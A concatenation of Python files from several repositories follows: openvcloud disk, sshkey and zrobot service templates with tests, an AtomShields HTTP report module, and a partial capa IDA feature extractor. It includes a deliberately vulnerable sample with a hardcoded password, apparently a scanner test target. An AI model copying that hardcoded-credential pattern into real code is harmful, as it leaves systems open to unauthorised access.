if isinstance(self.data[arg], type(value)):
if self.data[arg] != value:
self.data[arg] = value
return True
else:
raise TypeError("limit {lim} has type {type}, expected type {expect_type}".format(
lim=arg, type=type(value), expect_type=type(self.data[arg]))
)
return False
def install(self):
"""
Install disk.
If disk @id is present in data: check if disk with id exists and apply limits.
If disk @id is not given: create new disk with given limits.
"""
try:
self.state.check('actions', 'install', 'ok')
return
except StateCheckError:
pass
self.data['location'] = self.space.model['location']
if self.data['diskId']:
# if disk is given in data, check if disk exist
disks = self.account.disks
disk = [disk for disk in disks if disk['id'] == self.data['diskId']]
if not disk:
raise ValueError('Disk with id {} does not exist on account "{}"'.format(
self.data['diskId'], self.account.model['name'])
)
self.data['name'] = disk[0]['name']
else:
self._create()
self.state.set('actions', 'install', 'ok')
def _create(self):
""" Create disk in isolation
"""
data = self.data
# check existence of the disk. If ID field was updated in the service
gid = [location['gid'] for location in self.ovc.locations if location['name'] == data['location']]
if not gid:
raise RuntimeError('location "%s" not found' % data['location'])
data['diskId'] = self.account.disk_create(
name=data['name'],
gid=gid,
description=data['description'],
size=data['size'],
type=data['type'],
)
def uninstall(self):
"""
Uninstall disk. Delete disk if exists.
:param machine_service: name of the service,
managing VM where the disk attached.
Relevant only for attached disks
"""
disks = [disk['id'] for disk in self.account.disks]
if self.data['diskId'] in disks:
if self.data['type'] == 'B':
raise RuntimeError("can't delete boot disk")
self.account.disk_delete(self.data['diskId'], detach=False)
self.state.delete('actions', 'install')
self.data['diskId'] = 0
@property
def config(self):
"""
Return an object with names of vdc, account, and ovc
"""
if self._config is not None:
return self._config
config = {}
# get real vdc name
proxy = self.api.services.get(
template_uid=self.VDC_TEMPLATE, name=self.data['vdc'])
vdc_info = proxy.schedule_action(action='get_info').wait(die=True).result
config['vdc'] = vdc_info['name']
# get account name
proxy = self.api.services.get(
template_uid=self.ACCOUNT_TEMPLATE, name=vdc_info['account'])
account_info = proxy.schedule_action(action='get_info').wait(die=True).result
config['account'] = account_info['name']
# get ovc name
proxy = self.api.services.get(
template_uid=self.OVC_TEMPLATE, name=account_info['openvcloud'])
ovc_info = proxy.schedule_action(action='get_info').wait(die=True).result
config['ovc'] = ovc_info['name']
self._config = config
return self._config
@property
def ovc(self):
""" An ovc connection instance """
if not self._ovc:
self._ovc = j.clients.openvcloud.get(instance=self.config['ovc'])
return self._ovc
@property
def space(self):
""" Return vdc client """
if not self._space:
self._space = self.ovc.space_get(
accountName=self.config['account'],
spaceName=self.config['vdc']
)
return self._space
@property
def account(self):
if not self._account:
self._account = self.space.account
return self._account
def _limit_io(self):
data = self.data
self.ovc.api.cloudapi.disks.limitIO(
diskId=data['diskId'], iops=data['maxIops'], total_bytes_sec=data['totalBytesSec'],
read_bytes_sec=data['readBytesSec'], write_bytes_sec=data['writeBytesSec'],
total_iops_sec=data['totalIopsSec'], read_iops_sec=data['readIopsSec'],
write_iops_sec=data['writeIopsSec'], total_bytes_sec_max=data['totalBytesSecMax'],
read_bytes_sec_max=data['readBytesSecMax'], write_bytes_sec_max=data['writeBytesSecMax'],
total_iops_sec_max=data['totalIopsSecMax'], read_iops_sec_max=data['readIopsSecMax'],
write_iops_sec_max=data['writeIopsSecMax'], size_iops_sec=data['sizeIopsSec']
)
def get_info(self):
""" Retrun disk info if disk is installed """
self.state.check('actions', 'install', 'ok')
return {
'serviceName' : self.name,
'deviceName' : self.data['name'],
'diskId' : self.data['diskId'],
'diskType' : self.data['type'],
'vdc' : self.data['vdc'],
}
```
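The `update` action above only touches limits whose arguments are not `None`, treats `0` as "unset this limit", and re-validates and re-applies the whole set through `_limit_io()` whenever anything changed. Below is a hypothetical invocation through the zerorobot proxy API used elsewhere in this repo; the `robot` client, the service name and the limit values are invented for illustration.

```python
# Hypothetical sketch: scheduling Disk.update() on an installed disk service.
# Assumes a zerorobot client `robot` exposing the same services/schedule_action
# API used in the test suites below; 'mydisk' is an invented service name.
proxy = robot.services.get(
    template_uid='github.com/openvcloud/0-templates/disk/0.0.1', name='mydisk')
task = proxy.schedule_action('update', {
    'totalBytesSec': 10485760,  # new value -> stored and applied through _limit_io()
    'maxIops': 0,               # 0 -> the limit is cleared on the OVC side
    'readIopsSec': None,        # None -> argument ignored, current data kept
})
task.wait(die=True)
```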
#### File: templates/sshkey/sshkey.py
```python
import paramiko
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
class Sshkey(TemplateBase):
version = '0.0.1'
template_name = "sshkey"
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
def validate(self):
"""
Implements 0-Robot validate
Validates the sshkey service
"""
# validate sshkey name
if not self.data['name']:
raise ValueError('name is required')
# validate passphrase
if not self.data['passphrase']:
raise ValueError('passphrase is required')
if len(self.data['passphrase']) < 5:
raise ValueError('passphrase must be min of 5 characters')
def install(self):
"""
Installs the ssh key
"""
try:
self.state.check('actions', 'install', 'ok')
return
except StateCheckError:
pass
dir = self.data['dir']
passphrase = self.data['passphrase']
name = self.data['name']
path = j.sal.fs.joinPaths(dir, name)
if not j.sal.fs.exists(path):
j.clients.sshkey.key_generate(
path, passphrase=passphrase, overwrite=True, returnObj=False)
else:
paramiko.RSAKey.from_private_key_file(path, password=passphrase)
# load key to ssh-agent
self._get_key().load()
self.state.set('actions', 'install', 'ok')
def uninstall(self):
"""
Uninstalls the sshkey client
Also deletes the key
"""
key = self._get_key()
key.delete()
self.state.delete('actions', 'install')
def _get_key(self):
"""
returns an SSHKey instance of provided key in provided path
"""
path = j.sal.fs.joinPaths(self.data['dir'], self.data['name'])
return j.clients.sshkey.get(
self.data['name'],
create=True,
data={
'path': path,
'passphrase_': self.data['passphrase'],
},
)
def get_info(self):
"""
Return sshkey info
"""
self.state.check('actions', 'install', 'ok')
return {
'name' : self.data['name'],
'dir' : self.data['dir'],
}
```
#### File: templates/sshkey/test_sshkey.py
```python
from js9 import j
import os
from unittest import TestCase
from unittest import mock
from zerorobot import config, template_collection
class TestSshKey(TestCase):
def setUp(self):
config.DATA_DIR = '/tmp'
self.type = template_collection._load_template(
"https://github.com/openvcloud/0-templates",
os.path.dirname(__file__)
)
def tearDown(self):
mock.patch.stopall()
@mock.patch.object(j.clients, '_sshkey')
def test_create(self, ssh):
dir = '/tmp'
passphrase = '<PASSWORD>'
sshkeyname = 'id_test'
name = 'test'
data = {'name': sshkeyname, 'dir': dir, 'passphrase': passphrase}
service = self.type(name, None, data)
service.validate()
service.install()
dir = '%s/%s' % (dir, sshkeyname)
ssh.key_generate.assert_called_once_with(
dir,
passphrase=passphrase,
overwrite=True,
returnObj=False
)
ssh.get.assert_called_once_with(
sshkeyname,
create=True,
data={
'path': dir,
'passphrase_': passphrase,
}
)
@mock.patch.object(j.clients, '_sshkey')
def test_create_default_dir(self, ssh):
dir = '/root/tmp'
passphrase = '<PASSWORD>'
sshkeyname = 'id_test'
name = 'test'
data = {'name': sshkeyname, 'dir': dir, 'passphrase': passphrase}
service = self.type(name, None, data)
service.validate()
service.install()
dir = '%s/%s' % (dir, sshkeyname)
ssh.key_generate.assert_called_once_with(
dir,
passphrase=passphrase,
overwrite=True,
returnObj=False
)
ssh.get.assert_called_once_with(
sshkeyname,
create=True,
data={
'path': dir,
'passphrase_': passphrase,
}
)
@mock.patch.object(j.clients, '_sshkey')
def test_create_bad_pass(self, ssh):
dir = '/root/.ssh'
passphrase = '<PASSWORD>'
name = 'test'
service = self.type(name, None, {'passphrase': passphrase})
with self.assertRaises(ValueError):
service.validate()
ssh.key_generate.assert_not_called()
ssh.get.assert_not_called()
```
#### File: templates/zrobot/zrobot.py
```python
from js9 import j
from zerorobot.template.base import TemplateBase
from zerorobot.template.state import StateCheckError
import gevent
class Zrobot(TemplateBase):
version = '0.0.1'
template_name = "zrobot"
NODE_TEMPLATE = 'github.com/openvcloud/0-templates/node/0.0.1'
DOCKER_IMAGE = 'jumpscale/0-robot:latest'
def __init__(self, name, guid=None, data=None):
super().__init__(name=name, guid=guid, data=data)
self._ovc = None
self._account = None
self._space = None
def validate(self):
for key in ['node', 'port']:
if not self.data[key]:
raise ValueError('%s is required' % key)
# validate accounts
nodes = self.api.services.find(template_uid=self.NODE_TEMPLATE, name=self.data['node'])
if len(nodes) != 1:
raise RuntimeError('found %s nodes, requires exactly one' % len(nodes))
def _prepare_repos(self, prefab, base):
for dir in ['data', 'config', 'ssh']:
prefab.core.dir_ensure(j.sal.fs.joinPaths(base, dir))
for dir in ['data', 'config']:
prefab.core.run('cd %s && git init' % j.sal.fs.joinPaths(base, dir))
key_dir = j.sal.fs.joinPaths(base, 'ssh')
if not prefab.core.exists('%s/id_rsa' % key_dir):
prefab.core.run('ssh-keygen -b 2048 -t rsa -f %s/id_rsa -q -N ""' % key_dir)
@property
def node(self):
nodes = self.api.services.find(template_uid=self.NODE_TEMPLATE, name=self.data['node'])
return nodes[0]
def install(self, force=False):
try:
self.state.check('actions', 'install', 'ok')
if not force:
return
except StateCheckError:
pass
node = j.tools.nodemgr.get(self.data['node'])
prefab = node.prefab
prefab.virtualization.docker.install()
prefab.core.run('docker rm -vf %s' % self.name, die=False)
prefab.core.run('docker pull %s' % self.DOCKER_IMAGE)
base = '/opt/zrobot'
self._prepare_repos(prefab, base)
cfg = j.sal.fs.fileGetContents(
j.sal.fs.joinPaths(j.sal.fs.getDirName(__file__), 'jumpscale9.toml')
)
prefab.core.file_write(
j.sal.fs.joinPaths(base, 'jumpscale9.toml'),
cfg.format(config=j.sal.fs.joinPaths(base, 'config'))
)
templates = ''
for template in self.data['templates']:
templates += ' -T %s' % template
prefab.core.run('''\
docker run -d --name {name} \
-v {base}/data:/opt/code/github/zrobot/data \
-v {base}/config:/opt/code/github/zrobot/config \
-v {base}/ssh:/root/.ssh \
-v {base}/jumpscale9.toml:/root/js9host/cfg/jumpscale9.toml \
-p 6600:6600 \
{image} \
zrobot server start \
-C [email protected]:zrobot/config -D [email protected]:zrobot/data \
{templates}
'''.format(
name=self.name,
base=base,
image=self.DOCKER_IMAGE,
templates=templates
))
# expose port forward
self.node.schedule_action(
'portforward_create',
{
'ports': [{
'source': self.data['port'],
'destination': 6600,
}]
}
)
for i in range(10):
if j.sal.nettools.tcpPortConnectionTest(node.addr, self.data['port']):
break
gevent.sleep(3)
else:
raise Exception('can not connect to robot "%s"' % self.name)
j.clients.zrobot.get(
self.name,
create=True,
data={
'url': 'http://%s:%s' % (node.addr, self.data['port'])
}
)
self.state.set('actions', 'install', 'ok')
```
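The `install` action assembles the `-T` template arguments for `zrobot server start` with a simple string loop before interpolating them into the `docker run` command. For illustration, two template repositories (the URLs here are just examples) produce the following string:

```python
# Sketch of how the templates string is assembled before being interpolated
# into the docker run command above (repository URLs are illustrative).
data = {'templates': ['github.com/openvcloud/0-templates',
                      'github.com/zero-os/0-templates']}
templates = ''
for template in data['templates']:
    templates += ' -T %s' % template

print(templates)
# ' -T github.com/openvcloud/0-templates -T github.com/zero-os/0-templates'
```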
#### File: ovc_tests/a_basic/accounts_tests.py
```python
import unittest
from framework.ovc_utils.utils import OVC_BaseTest
from random import randint
from JumpScale9Lib.clients.portal.PortalClient import ApiError
import time
class accounts(OVC_BaseTest):
def __init__(self, *args, **kwargs):
super(accounts, self).__init__(*args, **kwargs)
def setUp(self):
super(accounts, self).setUp()
self.acc1 = self.random_string()
self.acc1_name = self.random_string()
self.vdcuser = self.random_string()
self.vdcuser_name = self.random_string()
self.vdcusers[self.vdcuser] = {'name': self.vdcuser_name,
'openvcloud': self.openvcloud,
'provider': 'itsyouonline',
'email': '%s<EMAIL>' % self.random_string(),
'groups': ['user']}
self.accounts = dict()
self.temp_actions = {'openvcloud': {'actions': ['install']},
'account': {'actions': ['install']},
'vdcuser': {'actions': ['install']}}
self.CLEANUP["accounts"].append(self.acc1)
@unittest.skip('https://github.com/openvcloud/0-templates/issues/117')
def test001_create_account_with_wrong_params(self):
""" ZRT-OVC-001
*Test case for creating account with different or missing parameters*
**Test Scenario:**
#. Create an account without providing an account name parameter, should fail.
#. Create an account without providing openvcloud parameter, should fail.
#. Create an account with providing non existing openvcloud value, should fail.
"""
self.log('%s STARTED' % self._testID)
self.log('Create an account without providing an account name parameter, should fail.')
self.accounts[self.acc1] = {}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(res, '"name" is required')
self.log('Create an account without providing openvcloud parameter, should fail')
self.accounts[self.acc1] = {'name': self.random_string()}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(res, '"openvcloud" is required')
self.log('Create an account with providing wrong openvcloud value, should fail.')
self.accounts[self.acc1] = {'name': self.random_string(),
'openvcloud': self.random_string()}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(res, 'found 0 openvcloud connections, requires exactly 1')
self.log('%s ENDED' % self._testID)
def test002_create_account_with_correct_params(self):
""" ZRT-OVC-002
*Test case for creating account with correct parameters*
**Test Scenario:**
#. Create two accounts, should succeed.
#. Check if the 1st account parameters are reflected correctly on OVC.
#. Check if the 2nd account was created, should succeed.
"""
self.log('%s STARTED' % self._testID)
CU_D = randint(15, 30)
CU_C = randint(15, 30)
CU_I = randint(15, 30)
CU_M = randint(15, 30)
self.accounts[self.acc1] = {'openvcloud': self.openvcloud,
'name': self.acc1_name,
'maxMemoryCapacity': CU_M,
'maxCPUCapacity': CU_C, 'maxVDiskCapacity': CU_D,
'maxNumPublicIP': CU_I
}
self.acc2 = self.random_string()
account2_name = self.random_string()
self.accounts[self.acc2] = {'openvcloud': self.openvcloud, 'name': account2_name }
self.CLEANUP["accounts"].append(self.acc2)
self.log('Create two accounts, should succeed')
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['install'])
self.wait_for_service_action_status(self.acc2, res[self.acc2]['install'])
self.log('Check if the 1st account parameters are reflected correctly on OVC')
account = self.get_account(self.acc1_name)
self.assertEqual(account['status'], 'CONFIRMED')
self.assertEqual(account['resourceLimits']['CU_D'], CU_D)
self.assertEqual(account['resourceLimits']['CU_C'], CU_C)
self.assertEqual(account['resourceLimits']['CU_I'], CU_I)
self.assertEqual(account['resourceLimits']['CU_M'], CU_M)
self.log('Check if the 2nd account was created, should succeed.')
account = self.get_account(account2_name)
self.assertEqual(account['status'], 'CONFIRMED')
self.log('%s ENDED' % self._testID)
def test003_update_account__params(self):
""" ZRT-OVC-003
*Test case for updating account's parameters*
**Test Scenario:**
#. Create an account, should succeed
#. Check if the account parameters are reflected correctly on OVC.
#. Update some parameters and make sure it is updated.
"""
self.log('%s STARTED' % self._testID)
CU_D = randint(15, 30)
CU_C = randint(15, 30)
CU_I = randint(15, 30)
CU_M = randint(15, 30)
self.accounts[self.acc1] = {'name': self.acc1_name, 'openvcloud': self.openvcloud,
'maxMemoryCapacity': CU_M, 'maxCPUCapacity': CU_C,
'maxVDiskCapacity': CU_D, 'maxNumPublicIP': CU_I}
self.log('Create an account, should succeed')
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['install'])
self.log('Check if the account parameters are reflected correctly on OVC')
account = self.get_account(self.acc1_name)
self.assertEqual(account['status'], 'CONFIRMED')
self.log('Update some parameters and make sure it is updated')
self.temp_actions['account'] = {'actions': ['update'],
'args': {"maxMemoryCapacity": CU_M - 1, "maxCPUCapacity": CU_C - 1,
"maxVDiskCapacity": CU_D - 1, "maxNumPublicIP": CU_I - 1}}
self.accounts[self.acc1] = {'openvcloud': self.openvcloud}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['update'])
account = self.get_account(self.acc1_name)
self.assertEqual(account['resourceLimits']['CU_D'], CU_D - 1)
self.assertEqual(account['resourceLimits']['CU_C'], CU_C - 1)
self.assertEqual(account['resourceLimits']['CU_I'], CU_I - 1)
self.assertEqual(account['resourceLimits']['CU_M'], CU_M - 1)
self.log('%s ENDED' % self._testID)
def test004_account_add_delete_user(self):
""" ZRT-OVC-004
*Test case for updating account with fake user*
**Test Scenario:**
#. Create an account (A1).
#. Add an existing user to A1, should succeed.
#. Delete an existing user from A1, should succeed.
"""
self.log('%s STARTED' % self._testID)
self.accounts[self.acc1] = {'name': self.acc1_name, 'openvcloud': self.openvcloud}
self.log('Create an account, should succeed')
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertTrue(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['install'])
self.log('Add an existing user to A1, should succeed.')
self.temp_actions['account']['args'] = {'vdcuser': self.vdcuser, 'accesstype': 'R'}
self.temp_actions['account']['actions'] = ['user_authorize']
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['user_authorize'])
account = self.get_account(self.acc1_name)
self.assertIn('%s@itsyouonline' % self.vdcuser_name,
[user['userGroupId'] for user in account['acl']])
self.log('Delete an existing user from A1, should succeed.')
self.temp_actions['account']['actions'] = ['user_unauthorize']
self.temp_actions['account']['args'] = {'vdcuser': self.vdcuser}
res = self.create_account(openvcloud=self.openvcloud, vdcusers=self.vdcusers,
accounts=self.accounts, temp_actions=self.temp_actions)
self.assertEqual(type(res), type(dict()))
self.wait_for_service_action_status(self.acc1, res[self.acc1]['user_unauthorize'])
account = self.get_account(self.acc1_name)
self.assertNotIn('%s@itsyouonline' % self.vdcuser_name,
[user['userGroupId'] for user in account['acl']])
self.log('%s ENDED' % self._testID)
def test005_get_account_info(self):
""" ZRT-OVC-022
*Test case for getting account info*
**Test Scenario:**
#. Create an account (A1).
#. Get A1 and check its info.
"""
self.log('%s STARTED' % self._testID)
self.log('Create an account (A1)')
openvcloud_service_name = self.random_string()
ovc = self.robot.services.create(
template_uid="{}/openvcloud/{}".format(self.repo, self.version),
service_name=openvcloud_service_name,
data={'name': self.random_string(),
'location': self.location,
'address': self.env,
'token': self.iyo_jwt()}
)
ovc.schedule_action('install')
account_service_name = self.random_string()
account_name = self.random_string()
account = self.robot.services.create(
template_uid="{}/account/{}".format(self.repo, self.version),
service_name=account_service_name,
data={'name': account_name, 'openvcloud': openvcloud_service_name}
)
account.schedule_action('install')
self.log('Get A1 and check its info')
acc_info = account.schedule_action('get_info').wait(die=True).result
self.assertEqual(account_name, acc_info['name'])
self.assertEqual(openvcloud_service_name, acc_info['openvcloud'])
self.assertEqual('CXDRAU', acc_info['users'][0]['accesstype'])
ovc.schedule_action('uninstall')
account.schedule_action('uninstall')
account.delete()
ovc.delete()
self.log('%s ENDED' % self._testID)
def test006_set_vdcuser_groups(self):
""" ZRT-OVC-023
*Test case for setting vdcuser groups*
**Test Scenario:**
#. Create vdc user, should succeed.
#. Set user groups and check if it was set.
"""
self.log('%s STARTED' % self._testID)
self.log('Create vdc user, should succeed')
openvcloud_service_name = self.random_string()
ovc = self.robot.services.create(
template_uid="{}/openvcloud/{}".format(self.repo, self.version),
service_name=openvcloud_service_name,
data={'name': self.random_string(),
'location': self.location,
'address': self.env,
'token': self.iyo_jwt()}
)
ovc.schedule_action('install')
vdcuser_service_name = self.random_string()
vdcuser_name = self.random_string()
vdcuser = self.robot.services.create(
template_uid="github.com/openvcloud/0-templates/vdcuser/0.0.1",
service_name=vdcuser_service_name,
data={'name': vdcuser_name,
'openvcloud': openvcloud_service_name,
'email': '{}<EMAIL>'.format(self.random_string())}
)
vdcuser.schedule_action('install')
self.log('Set user groups and check if it was set')
vdcuser.schedule_action('groups_set', {'groups': ['level1', 'level2']})
time.sleep(12)
user = self.ovc_client.api.system.usermanager.userget(name='{}@itsyouonline'.format(vdcuser_name))
self.assertIn('level1', user['groups'])
self.assertIn('level2', user['groups'])
self.log('Delete vdcuser, should succeed ')
vdcuser.schedule_action('uninstall')
try:
self.ovc_client.api.system.usermanager.userget(name='{}@itsyouonline'.format(vdcuser_name))
except ApiError as e:
self.assertEqual(e.response.status_code, 404)
self.log('%s ENDED' % self._testID)
``` |
{
"source": "5l1v3r1/AtomShields",
"score": 3
} |
#### File: atomshields/reports/http.py
```python
from atomshields.reports.base import *
import requests, json
class HttpReport(GenericReport):
"""
This module sends all information about vulnerabilities to an endpoint via an http request.
Attributes:
NAME (str): Name of the module.
DESCRIPTION (str): Description of the functionality of the module.
CONFIG (dict): Default values of the module configuration.
"""
NAME = "http"
DESCRIPTION = """Envia los datos de las vulnerabilidades a un endpoint HTTP"""
CONFIG = {
"enabled": False,
"url": "<your_endpoint>",
"method": "post",
"use_proxy": False,
"proxy": "http://127.0.0.1:8080"
}
def __init__(self, *args, **kwargs):
"""
Class constructor. Must call parent constructor
"""
super(HttpReport, self).__init__(*args, **kwargs)
@report
def run(self):
"""
Method executed dynamically by the framework. It sends an HTTP request to the
endpoint set in the config file, carrying the issues and other data.
"""
options = {}
if bool(self.config['use_proxy']):
options['proxies'] = {"http": self.config['proxy'], "https": self.config['proxy']}
options["url"] = self.config['url']
options["data"] = {"issues": json.dumps(map(lambda x: x.__todict__(), self.issues))}
if 'get' == self.config['method'].lower():
requests.get(**options)
else:
requests.post(**options)
```
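The `run` method simply serialises every issue with `__todict__()` and sends the result to the configured URL with the configured HTTP method. A rough standalone sketch of the request it ends up making is shown below; the endpoint URL and the hand-built issue dictionary are invented stand-ins for the framework's issue objects.

```python
# Standalone sketch of the request HttpReport.run() issues.
# The endpoint URL and the issue dictionary are invented for illustration;
# real issues come from AtomShields and expose __todict__().
import json
import requests

config = {
    "enabled": True,
    "url": "http://reports.example.local/issues",   # hypothetical endpoint
    "method": "post",
    "use_proxy": False,
    "proxy": "http://127.0.0.1:8080",
}
issues = [{"name": "Hardcoded password", "file": "config.py", "severity": "High"}]

options = {
    "url": config["url"],
    "data": {"issues": json.dumps(issues)},
}
if config["use_proxy"]:
    options["proxies"] = {"http": config["proxy"], "https": config["proxy"]}

if config["method"].lower() == "get":
    requests.get(**options)
else:
    requests.post(**options)
```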
#### File: dataset/vulnerable/file_with_pass.py
```python
PASSWORD = '1'
def sample():
return PASSWORD
if __name__ == "__main__":
sample()
``` |
{
"source": "5l1v3r1/capa",
"score": 2
} |
#### File: extractors/ida/insn.py
```python
import idc
import idaapi
import idautils
import capa.features.extractors.helpers
import capa.features.extractors.ida.helpers
from capa.features import ARCH_X32, ARCH_X64, MAX_BYTES_FEATURE_SIZE, Bytes, String, Characteristic
from capa.features.insn import Number, Offset, Mnemonic
def get_arch(ctx):
"""
fetch the ARCH_* constant for the currently open workspace.
via <NAME>/@tmr232
https://reverseengineering.stackexchange.com/a/11398/17194
"""
if "arch" not in ctx:
info = idaapi.get_inf_structure()
if info.is_64bit():
ctx["arch"] = ARCH_X64
elif info.is_32bit():
ctx["arch"] = ARCH_X32
else:
raise ValueError("unexpected architecture")
return ctx["arch"]
def get_imports(ctx):
if "imports_cache" not in ctx:
ctx["imports_cache"] = capa.features.extractors.ida.helpers.get_file_imports()
return ctx["imports_cache"]
def check_for_api_call(ctx, insn):
""" check instruction for API call """
if not idaapi.is_call_insn(insn):
return
for ref in idautils.CodeRefsFrom(insn.ea, False):
info = get_imports(ctx).get(ref, ())
if info:
yield "%s.%s" % (info[0], info[1])
else:
f = idaapi.get_func(ref)
# check if call to thunk
# TODO: first instruction might not always be the thunk
if f and (f.flags & idaapi.FUNC_THUNK):
for thunk_ref in idautils.DataRefsFrom(ref):
# TODO: always data ref for thunk??
info = get_imports(ctx).get(thunk_ref, ())
if info:
yield "%s.%s" % (info[0], info[1])
def extract_insn_api_features(f, bb, insn):
""" parse instruction API features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
call dword [0x00473038]
"""
for api in check_for_api_call(f.ctx, insn):
for (feature, ea) in capa.features.extractors.helpers.generate_api_features(api, insn.ea):
yield feature, ea
def extract_insn_number_features(f, bb, insn):
""" parse instruction number features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
push 3136B0h ; dwControlCode
"""
if idaapi.is_ret_insn(insn):
# skip things like:
# .text:0042250E retn 8
return
if capa.features.extractors.ida.helpers.is_sp_modified(insn):
# skip things like:
# .text:00401145 add esp, 0Ch
return
for op in capa.features.extractors.ida.helpers.get_insn_ops(insn, target_ops=(idaapi.o_imm, idaapi.o_mem)):
if op.type == idaapi.o_imm:
const = capa.features.extractors.ida.helpers.mask_op_val(op)
else:
const = op.addr
if not idaapi.is_mapped(const):
yield Number(const), insn.ea
yield Number(const, arch=get_arch(f.ctx)), insn.ea
def extract_insn_bytes_features(f, bb, insn):
""" parse referenced byte sequences
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
push offset iid_004118d4_IShellLinkA ; riid
"""
ref = capa.features.extractors.ida.helpers.find_data_reference_from_insn(insn)
if ref != insn.ea:
extracted_bytes = capa.features.extractors.ida.helpers.read_bytes_at(ref, MAX_BYTES_FEATURE_SIZE)
if extracted_bytes and not capa.features.extractors.helpers.all_zeros(extracted_bytes):
yield Bytes(extracted_bytes), insn.ea
def extract_insn_string_features(f, bb, insn):
""" parse instruction string features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
push offset aAcr ; "ACR > "
"""
ref = capa.features.extractors.ida.helpers.find_data_reference_from_insn(insn)
if ref != insn.ea:
found = capa.features.extractors.ida.helpers.find_string_at(ref)
if found:
yield String(found), insn.ea
def extract_insn_offset_features(f, bb, insn):
""" parse instruction structure offset features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
example:
.text:0040112F cmp [esi+4], ebx
"""
for op in capa.features.extractors.ida.helpers.get_insn_ops(insn, target_ops=(idaapi.o_phrase, idaapi.o_displ)):
if capa.features.extractors.ida.helpers.is_op_stack_var(insn.ea, op.n):
continue
p_info = capa.features.extractors.ida.helpers.get_op_phrase_info(op)
op_off = p_info.get("offset", 0)
if idaapi.is_mapped(op_off):
# Ignore:
# mov esi, dword_1005B148[esi]
continue
# I believe that IDA encodes all offsets as two's complement in a u32.
# a 64-bit displacement isn't a thing, see:
# https://stackoverflow.com/questions/31853189/x86-64-assembly-why-displacement-not-64-bits
op_off = capa.features.extractors.helpers.twos_complement(op_off, 32)
yield Offset(op_off), insn.ea
yield Offset(op_off, arch=get_arch(f.ctx)), insn.ea
def contains_stack_cookie_keywords(s):
""" check if string contains stack cookie keywords
Examples:
xor ecx, ebp ; StackCookie
mov eax, ___security_cookie
"""
if not s:
return False
s = s.strip().lower()
if "cookie" not in s:
return False
return any(keyword in s for keyword in ("stack", "security"))
def bb_stack_cookie_registers(bb):
""" scan basic block for stack cookie operations
yield registers ids that may have been used for stack cookie operations
assume instruction that sets stack cookie and nzxor exist in same block
and stack cookie register is not modified prior to nzxor
Example:
.text:004062DA mov eax, ___security_cookie <-- stack cookie
.text:004062DF mov ecx, eax
.text:004062E1 mov ebx, [esi]
.text:004062E3 and ecx, 1Fh
.text:004062E6 mov edi, [esi+4]
.text:004062E9 xor ebx, eax
.text:004062EB mov esi, [esi+8]
.text:004062EE xor edi, eax <-- ignore
.text:004062F0 xor esi, eax <-- ignore
.text:004062F2 ror edi, cl
.text:004062F4 ror esi, cl
.text:004062F6 ror ebx, cl
.text:004062F8 cmp edi, esi
.text:004062FA jnz loc_40639D
TODO: this is expensive, but necessary?...
"""
for insn in capa.features.extractors.ida.helpers.get_instructions_in_range(bb.start_ea, bb.end_ea):
if contains_stack_cookie_keywords(idc.GetDisasm(insn.ea)):
for op in capa.features.extractors.ida.helpers.get_insn_ops(insn, target_ops=(idaapi.o_reg,)):
if capa.features.extractors.ida.helpers.is_op_write(insn, op):
# only include modified registers
yield op.reg
def is_nzxor_stack_cookie(f, bb, insn):
""" check if nzxor is related to stack cookie """
if contains_stack_cookie_keywords(idaapi.get_cmt(insn.ea, False)):
# Example:
# xor ecx, ebp ; StackCookie
return True
stack_cookie_regs = tuple(bb_stack_cookie_registers(bb))
if any(op_reg in stack_cookie_regs for op_reg in (insn.Op1.reg, insn.Op2.reg)):
# Example:
# mov eax, ___security_cookie
# xor eax, ebp
return True
return False
def extract_insn_nzxor_characteristic_features(f, bb, insn):
""" parse instruction non-zeroing XOR instruction
ignore expected non-zeroing XORs, e.g. security cookies
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
if insn.itype != idaapi.NN_xor:
return
if capa.features.extractors.ida.helpers.is_operand_equal(insn.Op1, insn.Op2):
return
if is_nzxor_stack_cookie(f, bb, insn):
return
yield Characteristic("nzxor"), insn.ea
def extract_insn_mnemonic_features(f, bb, insn):
""" parse instruction mnemonic features
args:
f (IDA func_t)
bb (IDA BasicBlock)
insn (IDA insn_t)
"""
yield Mnemonic(insn.get_canon_mnem()), insn.ea
def extract_insn_peb_access_characteristic_features(f, bb, insn):
""" parse instruction peb access
fs:[0x30] on x86, gs:[0x60] on x64
TODO:
IDA should be able to do this..
"""
if insn.itype not in (idaapi.NN_push, idaapi.NN_mov):
return
if all(map(lambda op: op.type != idaapi.o_mem, insn.ops)):
# try to optimize for only memory references
return
disasm = idc.GetDisasm(insn.ea)
